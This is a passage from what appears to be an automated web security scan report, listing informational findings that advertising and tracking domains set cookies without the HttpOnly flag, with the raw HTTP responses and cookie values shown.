P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:14:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.246. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/948985352.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JwQLVVzHG+gQ4O3XYcv0liDtqNncA2iFgL2J8AvNQGTGFQ+Pxd0pbW0Xm51WZTYVCOktTrquTMuOZBTTkw/IKBeEE1yCXK3b36BtHZFDnD6taOUzkVsstlxUvHpxx6DjOYyhPvK7p93Kw1M0xFLU8YywpcTCGhJkslmGD09u1vxbq9AgilVXTOe7YLMpaxwab1BrpZaOWmsitT5Y0P/+hoDI8UE/IyAMDpKGXhjriyhJgjfFE+ppfZQ32TSW00gZRkVJOtUxlY5Yo9vJAsssXzzkv8RozjQ2ow5LGokyTciv/oqeGkAgyA6qLu0UTvZKVMEDuiWMmkX0nGp7IALTzvYzZX1VV35S611OmwsUj/BtjCYFwhj0vIFQ3urxzt+UV7sjZoj7YCyIyN9dSpCyqSalgXxc/DVeFlZE2Y7rOhlNQYvwZnJF5d4moBJxG/sDxsjsX8Qa3Gsr4OpMi4bVqNzEkuCaDDEgu1UUc1X8n0QKuxspCuvu8Oejj9SwrWAhkuGz19zcg4YMGb4ewrib0GrKI2iHUVJMOl3syAixj4Kcld+V5pab1CYoBf0xuAw8eHaxH9EOfr4HWvqc7z7Ow+z3iq2GT7UWuqrMJW64IPWHK/tj2DnxcvlKsNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:24:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JwQLVVzHG+gQ4O3XYcv0liDtqNncA2iFgL2J8AvNQGTGFQ+Pxd0pbW0Xm51WZTYVCOktTrquTMuOZBTTkw/IKBeEE1yCXK3b36BtHZFDnD6taOUzkVsstlxUvHpxx6DjOYyhPvK7p93Kw1M0xFLU8YywpcTCGhJkslmGD09u1vxbq9AgilVXTOe7YLMpaxwab1BrpZaOWmsitT5Y0P/+hoDI8UE/IyAMDpKGXhjriyhJgjfFE+ppfZQ32TSW00gZRkVJOtUxlY5Yo9vJAsssXzzkv8RozjQ2ow5LGokyTciv/oqeGkAgyA6qLu0UTvZKVMEDuiWMmkX0nGp7IALTzvYzZX1VV35S611OmwsUj/BtjCYFwhj0vIFQ3urxzt+UV7sjZoj7YCyIyN9dSpCyqSalgXxc/DVeFlZE2Y7rOhlNQYvwZnJF5d4moBJxG/sDxsjsX8Qa3Gsr4OpMi4bVqNzEkuCaDDEgu1UUc1X8n0QKuxspCuvu8Oejj9SwrWAhkuGz19zcg4YMGb4ewrib0GrKI2iHUVJMOl3syAixj4Kcld+V5pab1CYoBf0xuAw8eHaxH9EOfr4HWvqc7z7Ow+z3iq2GT7UWuqrMJW64IPWHK/tj2DnxcvlKsNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:24:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:24:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.247. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/959799423.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb3/kL33k9EF2r0L6q0zBCf2clnbVQswmaXMDRS450iBm6UVyImQE5tom4V71U1T0oSRSaEIpX4BxlKwSDhOzC4DbmFxVBi3YwKtpk/XFo2WgPJPKsSQOhotc9WMwLKSlaWuo2ucgoJrMZKo7cxTxNazaUWcV8AH1Xt3RSiifMFg+RGshM4YdG0UyUpLcODe4Jl01XQoZu7OxMjgrgKyQm2I9JWpCZwyuBDXuBvLpvgzBaoxUCOo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:26:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb3/kL33k9EF2r0L6q0zBCf2clnbVQswmaXMDRS450iBm6UVyImQE5tom4V71U1T0oSRSaEIpX4BxlKwSDhOzC4DbmFxVBi3YwKtpk/XFo2WgPJPKsSQOhotc9WMwLKSlaWuo2ucgoJrMZKo7cxTxNazaUWcV8AH1Xt3RSiifMFg+RGshM4YdG0UyUpLcODe4Jl01XQoZu7OxMjgrgKyQm2I9JWpCZwyuBDXuBvLpvgzBaoxUCOo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:26:50 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 11:26:49 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.248. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/961894975.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pVfJOHtW0A4KYh9LaIj+x0G4F9zRU+sOohe7OqAUbNvDCQtVo1G6MP6Vy3i752mR8CD5MOaWITT19GmvAHjLO26lbm5fFWrFFMTh5ZgLXiQRjSAdYmdmJxcwmcndbW5GD4QQZOLlE8oZWjFM67BWIP270Sg+rxtsJ21UcoLDyljRZUGiMCPdO16hfc+goh8mSOFKvEaKvG6xta9uKPqvtvA3CVbdeEkhIJ3TjyZrGG6sqwQ+LrbJlL2uqw6tCbi55Z1G4L76xaNQuxpP0iKeULJPEv5fkk8iaittLGEZxTkfFXA58QKuxsoi2qtRtkE7SWndRo4C+Co7u6uHF8hU2HcPVGXSlULnuApfy5eUq8Bac3Q/l/KPuVhm3K080yOHYUlqz0da0TwsEKt8NLUoeiNILawsWTBVqe672cNE2Ew3cY6ZSVQqduHB88tXw/bwNMQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:10:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pVfJOHtW0A4KYh9LaIj+x0G4F9zRU+sOohe7OqAUbNvDCQtVo1G6MP6Vy3i752mR8CD5MOaWITT19GmvAHjLO26lbm5fFWrFFMTh5ZgLXiQRjSAdYmdmJxcwmcndbW5GD4QQZOLlE8oZWjFM67BWIP270Sg+rxtsJ21UcoLDyljRZUGiMCPdO16hfc+goh8mSOFKvEaKvG6xta9uKPqvtvA3CVbdeEkhIJ3TjyZrGG6sqwQ+LrbJlL2uqw6tCbi55Z1G4L76xaNQuxpP0iKeULJPEv5fkk8iaittLGEZxTkfFXA58QKuxsoi2qtRtkE7SWndRo4C+Co7u6uHF8hU2HcPVGXSlULnuApfy5eUq8Bac3Q/l/KPuVhm3K080yOHYUlqz0da0TwsEKt8NLUoeiNILawsWTBVqe672cNE2Ew3cY6ZSVQqduHB88tXw/bwNMQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:10:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:10:21 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.249. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/97296821.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9QBKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C76Jgxbq9AgilVXSOe7YLMp6xwab1BrpZaOWmsitT5dU9IfLwuNg89QDwPBAC4ur48OcOcA1xi2GVNLDOnn9+ZVEkHb0IOQppkywim9r6oMCsyGp5QINfekp4OAtoWFhe8LaMNd0oNIrrqTsPSnLC9jHHtZCIc3jQS5IOTrrEInfpEWiCeiIahqNuFuKBQ4qweMCtY2r/KLXEYgCpNCMa/33M1Me2skHCgHAZdUYutFVDjHY8aZA3RQeILFC3MEFNa5BpNqaDlanI5eI8Z1cnxxtC4vTtpm6rHLBHrTrq/n/HqXwP/lHd+mEVwBG90W93W0aM1bW2AmFNr9jZUSYx0WIrLl9aQ0nBEt+ud5w7ywePV9vyQTYia6nuRVrI7yWGmvWLeiMUNeSXFaR32t1Om8q1dSr7ZIhW/DF8cZk+Q7Jz1CGHE6bVWqfEeqNOPhxoxmC/yS0id7nsNMi58LqbR9vXG4DhGiHEw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:09:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9QBKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C76Jgxbq9AgilVXSOe7YLMp6xwab1BrpZaOWmsitT5dU9IfLwuNg89QDwPBAC4ur48OcOcA1xi2GVNLDOnn9+ZVEkHb0IOQppkywim9r6oMCsyGp5QINfekp4OAtoWFhe8LaMNd0oNIrrqTsPSnLC9jHHtZCIc3jQS5IOTrrEInfpEWiCeiIahqNuFuKBQ4qweMCtY2r/KLXEYgCpNCMa/33M1Me2skHCgHAZdUYutFVDjHY8aZA3RQeILFC3MEFNa5BpNqaDlanI5eI8Z1cnxxtC4vTtpm6rHLBHrTrq/n/HqXwP/lHd+mEVwBG90W93W0aM1bW2AmFNr9jZUSYx0WIrLl9aQ0nBEt+ud5w7ywePV9vyQTYia6nuRVrI7yWGmvWLeiMUNeSXFaR32t1Om8q1dSr7ZIhW/DF8cZk+Q7Jz1CGHE6bVWqfEeqNOPhxoxmC/yS0id7nsNMi58LqbR9vXG4DhGiHEw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:09:22 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:09:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.250. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/978202705.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt8El+O6vsJSum2NB/leM3NskvAjloepK63+nuNJXDsrq4xoUabTBovG12bYtsNz7Ao3U4T4c828xyLWWNlcMSklFjL3l2VgeOKC+J5znJwPRxJOUJBXR9BOb0in8rTuPvTzdZZfAePiWl5LSsogNJomDCF3VwWHhUno5GVPQlsUYnsmKo93ec3l97uRk+XFTftWQe+LFw0ydkk7nzYWQa2594W8VhRHY8hMTkLA+ebbmK6C9cu0L9eiewtsiV114KM6xywZeLfwtrBBWC6wXH4EiQ60ZtZ9HjC65us4EZtryH4d89UJuHuI2+Pj0TLKI7o6DzI9QVfQwgAvQ8pOissEUSF4PlTW84QuxfJUnBabEg3/LDlToXvABg1h+tm66pzNl7K4zty3avS9TQkjyPXb4prWAJZ2EJkRmrkZexi3ZQMvHJ0ZtyNv/CzYfZ4oS/mBuqs3BkTI0c9KWNC+jFwp2RGN4K+YxJpJj4RWgZvpx9SgHo7xrptyFxQDiBbF5vtksKQ/9jsq5u1tJ8Wi87OdhAm/aYKqdei0ZS9nNgSfG3Vc1cS/Koxt2e+5/nJiB06achvUFqhmTPbVqtERJt85jcH97w4hNkdQpdMbyvMW9Xi9V7j/Qxckcv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:19:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt8El+O6vsJSum2NB/leM3NskvAjloepK63+nuNJXDsrq4xoUabTBovG12bYtsNz7Ao3U4T4c828xyLWWNlcMSklFjL3l2VgeOKC+J5znJwPRxJOUJBXR9BOb0in8rTuPvTzdZZfAePiWl5LSsogNJomDCF3VwWHhUno5GVPQlsUYnsmKo93ec3l97uRk+XFTftWQe+LFw0ydkk7nzYWQa2594W8VhRHY8hMTkLA+ebbmK6C9cu0L9eiewtsiV114KM6xywZeLfwtrBBWC6wXH4EiQ60ZtZ9HjC65us4EZtryH4d89UJuHuI2+Pj0TLKI7o6DzI9QVfQwgAvQ8pOissEUSF4PlTW84QuxfJUnBabEg3/LDlToXvABg1h+tm66pzNl7K4zty3avS9TQkjyPXb4prWAJZ2EJkRmrkZexi3ZQMvHJ0ZtyNv/CzYfZ4oS/mBuqs3BkTI0c9KWNC+jFwp2RGN4K+YxJpJj4RWgZvpx9SgHo7xrptyFxQDiBbF5vtksKQ/9jsq5u1tJ8Wi87OdhAm/aYKqdei0ZS9nNgSfG3Vc1cS/Koxt2e+5/nJiB06achvUFqhmTPbVqtERJt85jcH97w4hNkdQpdMbyvMW9Xi9V7j/Qxckcv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:19:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:19:21 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.251. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ECIBlgEBgAeBUNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Wed, 14-Sep-2011 19:27:43 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.252. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EAMBlgEBgQeBcNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Thu, 15-Sep-2011 10:10:54 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.253. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/p-9eJ8k4iSzux46.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ENMBLwGBB4GTA-qT4vrhAguOEPUIMECOMOyzAA; expires=Thu, 15-Sep-2011 10:12:05 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.254. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; expires=Tue, 13-Dec-2011 11:28:38 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.255. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%264222%3D1; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C0%2C2%2C%2C; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.pixel.rubiconproject.com
put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.256. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C2%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.pixel.rubiconproject.com
put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.257. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%265326%3D1%265364%3D1; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com
